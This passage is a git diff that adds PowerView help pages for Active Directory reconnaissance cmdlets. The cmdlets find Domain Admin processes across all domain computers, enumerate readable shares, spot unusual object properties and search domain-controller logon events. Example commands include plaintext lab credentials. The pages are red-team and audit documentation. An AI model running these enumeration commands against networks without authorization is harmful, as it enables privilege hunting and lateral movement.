
+

+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer, Get-ForestSchemaClass

+

+## SYNTAX

+

+### ClassName (Default)

+```

+Find-DomainObjectPropertyOutlier [-ClassName] <String> [-ReferencePropertySet <String[]>] [-Domain <String>]

+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+### ReferenceObject

+```

+Find-DomainObjectPropertyOutlier [-ReferencePropertySet <String[]>] -ReferenceObject <PSObject>

+ [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Enumerates the schema for the specified -ClassName (if passed) by using Get-ForestSchemaClass.

+If a -ReferenceObject is passed, the class is extracted from the passed object.

+A 'reference' set of property names is then calculated, either from a standard set preserved

+for user/group/computers, or from the array of names passed to -ReferencePropertySet, or

+from the property names of the passed -ReferenceObject.

+These property names are substracted

+from the master schema propertyu name list to retrieve a set of 'non-standard' properties.

+Every user/group/computer object (depending on determined class) are enumerated, and for each

+object, if the object has a 'non-standard' property set, the object samAccountName, property

+name, and property value are output to the pipeline.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-DomainObjectPropertyOutlier -User

+```

+

+Enumerates users in the current domain with 'outlier' properties filled in.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Find-DomainObjectPropertyOutlier -Group -Domain external.local

+```

+

+Enumerates groups in the external.local forest/domain with 'outlier' properties filled in.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier

+```

+

+Enumerates computers in the current domain with 'outlier' properties filled in.

+

+## PARAMETERS

+

+### -ClassName

+Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'.

+If -ReferenceObject is specified, this will be automatically extracted, if possible.

+

+```yaml

+Type: String

+Parameter Sets: ClassName

+Aliases: Class

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ReferencePropertySet

+Specifies an array of property names to diff against the class schema.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ReferenceObject

+Specicifes the PowerView user/group/computer object to extract property names

+from to use as the reference set.

+

+```yaml

+Type: PSObject

+Parameter Sets: ReferenceObject

+Aliases: 

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.PropertyOutlier

+

+Custom PSObject with translated object property outliers.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Find-DomainProcess.md b/docs/Recon/Find-DomainProcess.md
new file mode 100755
index 0000000..89dc568
--- /dev/null
+++ b/docs/Recon/Find-DomainProcess.md
@@ -0,0 +1,517 @@
+# Find-DomainProcess

+

+## SYNOPSIS

+Searches for processes on the domain using WMI, returning processes

+that match a particular user specification or process name.

+

+Thanks to @paulbrandau for the approach idea.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction

+

+## SYNTAX

+

+### None (Default)

+```

+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]

+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]

+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]

+ [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>]

+ [-Jitter <Double>] [-Threads <Int32>]

+```

+

+### TargetProcess

+```

+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]

+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]

+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]

+ [-ProcessName <String[]>] [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]

+```

+

+### UserIdentity

+```

+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]

+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]

+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]

+ [-UserIdentity <String[]>] [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]

+```

+

+### TargetUser

+```

+Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]

+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]

+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]

+ [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>]

+ [-UserGroupIdentity <String[]>] [-UserAdminCount] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]

+```

+

+## DESCRIPTION

+This function enumerates all machines on the current (or specified) domain

+using Get-DomainComputer, and queries the domain for users of a specified group

+(default 'Domain Admins') with Get-DomainGroupMember.

+Then for each server the

+function enumerates any current processes running with Get-WMIProcess,

+searching for processes running under any target user contexts or with the

+specified -ProcessName.

+If -Credential is passed, it is passed through to

+the underlying WMI commands used to enumerate the remote machines.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-DomainProcess

+```

+

+Searches for processes run by 'Domain Admins' by enumerating every computer in the domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local

+```

+

+Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by

+privileged users in dev.testlab.local.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Find-DomainProcess -ProcessName putty.exe

+```

+

+Searchings for instances of putty.exe running on the current domain.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Find-DomainProcess -Domain testlab.local -Credential $Cred

+

+Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials.

+

+## PARAMETERS

+

+### -ComputerName

+Specifies an array of one or more hosts to enumerate, passable on the pipeline.

+If -ComputerName is not passed, the default behavior is to enumerate all machines

+in the domain returned by Get-DomainComputer.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DNSHostName

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to query for computers AND users, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerDomain

+Specifies the domain to query for computers, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerLDAPFilter

+Specifies an LDAP query string that is used to search for computer objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerSearchBase

+Specifies the LDAP source to search through for computers,

+e.g.

+"LDAP://OU=secret,DC=testlab,DC=local".

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerUnconstrained

+Switch.

+Search computer objects that have unconstrained delegation.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: Unconstrained

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerOperatingSystem

+Search computers with a specific operating system, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: OperatingSystem

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerServicePack

+Search computers with a specific service pack, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ServicePack

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerSiteName

+Search computers in the specific AD Site name, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: SiteName

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ProcessName

+Search for processes with one or more specific names.

+

+```yaml

+Type: String[]

+Parameter Sets: TargetProcess

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserIdentity

+Specifies one or more user identities to search for.

+

+```yaml

+Type: String[]

+Parameter Sets: UserIdentity, TargetUser

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserDomain

+Specifies the domain to query for users to search for, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: TargetUser

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserLDAPFilter

+Specifies an LDAP query string that is used to search for target users.

+

+```yaml

+Type: String

+Parameter Sets: TargetUser

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserSearchBase

+Specifies the LDAP source to search through for target users.

+e.g.

+"LDAP://OU=secret,DC=testlab,DC=local".

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: TargetUser

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserGroupIdentity

+Specifies a group identity to query for target users, defaults to 'Domain Admins.

+If any other user specifications are set, then UserGroupIdentity is ignored.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: GroupName, Group

+

+Required: False

+Position: Named

+Default value: Domain Admins

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserAdminCount

+Switch.

+Search for users users with '(adminCount=1)' (meaning are/were privileged).

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: TargetUser

+Aliases: AdminCount

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain and target systems.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -StopOnSuccess

+Switch.

+Stop hunting after finding after finding a target user.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Delay

+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Jitter

+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3

+

+```yaml

+Type: Double

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0.3

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Threads

+The number of threads to use for user searching, defaults to 20.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 20

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.UserProcess

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Find-DomainShare.md b/docs/Recon/Find-DomainShare.md
new file mode 100755
index 0000000..71274b7
--- /dev/null
+++ b/docs/Recon/Find-DomainShare.md
@@ -0,0 +1,335 @@
+# Find-DomainShare

+

+## SYNOPSIS

+Searches for computer shares on the domain.

+If -CheckShareAccess is passed,

+then only shares the current user has read access to are returned.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction

+

+## SYNTAX

+

+```

+Find-DomainShare [[-ComputerName] <String[]>] [-ComputerDomain <String>] [-ComputerLDAPFilter <String>]

+ [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>]

+ [-ComputerSiteName <String>] [-CheckShareAccess] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+ [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]

+```

+

+## DESCRIPTION

+This function enumerates all machines on the current (or specified) domain

+using Get-DomainComputer, and enumerates the available shares for each

+machine with Get-NetShare.

+If -CheckShareAccess is passed, then

+\[IO.Directory\]::GetFiles() is used to check if the current user has read

+access to the given share.

+If -Credential is passed, then

+Invoke-UserImpersonation is used to impersonate the specified user before

+enumeration, reverting after with Invoke-RevertToSelf.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-DomainShare

+```

+

+Find all domain shares in the current domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Find-DomainShare -CheckShareAccess

+```

+

+Find all domain shares in the current domain that the current user has

+read access to.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Find-DomainShare -Domain testlab.local -Credential $Cred

+

+Searches for domain shares in the testlab.local domain using the specified alternate credentials.

+

+## PARAMETERS

+

+### -ComputerName

+Specifies an array of one or more hosts to enumerate, passable on the pipeline.

+If -ComputerName is not passed, the default behavior is to enumerate all machines

+in the domain returned by Get-DomainComputer.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DNSHostName

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -ComputerDomain

+Specifies the domain to query for computers, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Domain

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerLDAPFilter

+Specifies an LDAP query string that is used to search for computer objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerSearchBase

+Specifies the LDAP source to search through for computers,

+e.g.

+"LDAP://OU=secret,DC=testlab,DC=local".

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerOperatingSystem

+Search computers with a specific operating system, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: OperatingSystem

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerServicePack

+Search computers with a specific service pack, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ServicePack

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerSiteName

+Search computers in the specific AD Site name, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: SiteName

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -CheckShareAccess

+Switch.

+Only display found shares that the local user has access to.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: CheckAccess

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain and target systems.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Delay

+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Jitter

+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3

+

+```yaml

+Type: Double

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0.3

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Threads

+The number of threads to use for user searching, defaults to 20.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 20

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.ShareInfo

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Find-DomainUserEvent.md b/docs/Recon/Find-DomainUserEvent.md
new file mode 100755
index 0000000..12e64a9
--- /dev/null
+++ b/docs/Recon/Find-DomainUserEvent.md
@@ -0,0 +1,451 @@
+# Find-DomainUserEvent

+

+## SYNOPSIS

+Finds logon events on the current (or remote domain) for the specified users.

+

+Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction

+

+## SYNTAX

+

+### Domain (Default)

+```

+Find-DomainUserEvent [-Domain <String>] [-Filter <Hashtable>] [-StartTime <DateTime>] [-EndTime <DateTime>]

+ [-MaxEvents <Int32>] [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>]

+ [-UserSearchBase <String>] [-UserGroupIdentity <String[]>] [-UserAdminCount] [-CheckAccess] [-Server <String>]

+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]

+ [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]

+```

+

+### ComputerName

+```

+Find-DomainUserEvent [[-ComputerName] <String[]>] [-Filter <Hashtable>] [-StartTime <DateTime>]

+ [-EndTime <DateTime>] [-MaxEvents <Int32>] [-UserIdentity <String[]>] [-UserDomain <String>]

+ [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserGroupIdentity <String[]>] [-UserAdminCount]

+ [-CheckAccess] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>]

+ [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>]

+ [-Threads <Int32>]

+```

+

+## DESCRIPTION

+Enumerates all domain controllers from the specified -Domain

+(default of the local domain) using Get-DomainController, enumerates

+the logon events for each using Get-DomainUserEvent, and filters

+the results based on the targeting criteria.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-DomainUserEvent

+```

+

+Search for any user events matching domain admins on every DC in the current domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$cred = Get-Credential dev\administrator

+```

+

+Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john'

+

+Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local'

+domain controller using the alternate credential

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'}

+```

+

+Find user events on the primary.testlab.local system where the event matches

+the IPAddress '192.168.52.200' or '192.168.52.201'.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$cred = Get-Credential testlab\administrator

+```

+

+Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'}

+

+Find user events mathing the specified GUID AND the specified TargetLogonId, searching

+through every domain controller in the current domain, enumerating each DC in serial

+instead of in a threaded manner, using the alternate credential.

+

+## PARAMETERS

+

+### -ComputerName

+Specifies an explicit computer name to retrieve events from.

+

+```yaml

+Type: String[]

+Parameter Sets: ComputerName

+Aliases: dnshostname, HostName, name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies a domain to query for domain controllers to enumerate.

+Defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: Domain

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Filter

+A hashtable of PowerView.LogonEvent properties to filter for.

+The 'op|operator|operation' clause can have '&', '|', 'and', or 'or',

+and is 'or' by default, meaning at least one clause matches instead of all.

+See the exaples for usage.

+

+```yaml

+Type: Hashtable

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -StartTime

+The \[DateTime\] object representing the start of when to collect events.

+Default of \[DateTime\]::Now.AddDays(-1).

+

+```yaml

+Type: DateTime

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [DateTime]::Now.AddDays(-1)

+Accept pipeline input: True (ByPropertyName)

+Accept wildcard characters: False

+```

+

+### -EndTime

+The \[DateTime\] object representing the end of when to collect events.

+Default of \[DateTime\]::Now.

+

+```yaml

+Type: DateTime

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [DateTime]::Now

+Accept pipeline input: True (ByPropertyName)

+Accept wildcard characters: False

+```

+

+### -MaxEvents

+The maximum number of events (per host) to retrieve.

+Default of 5000.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 5000

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserIdentity

+Specifies one or more user identities to search for.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserDomain

+Specifies the domain to query for users to search for, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserLDAPFilter

+Specifies an LDAP query string that is used to search for target users.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserSearchBase

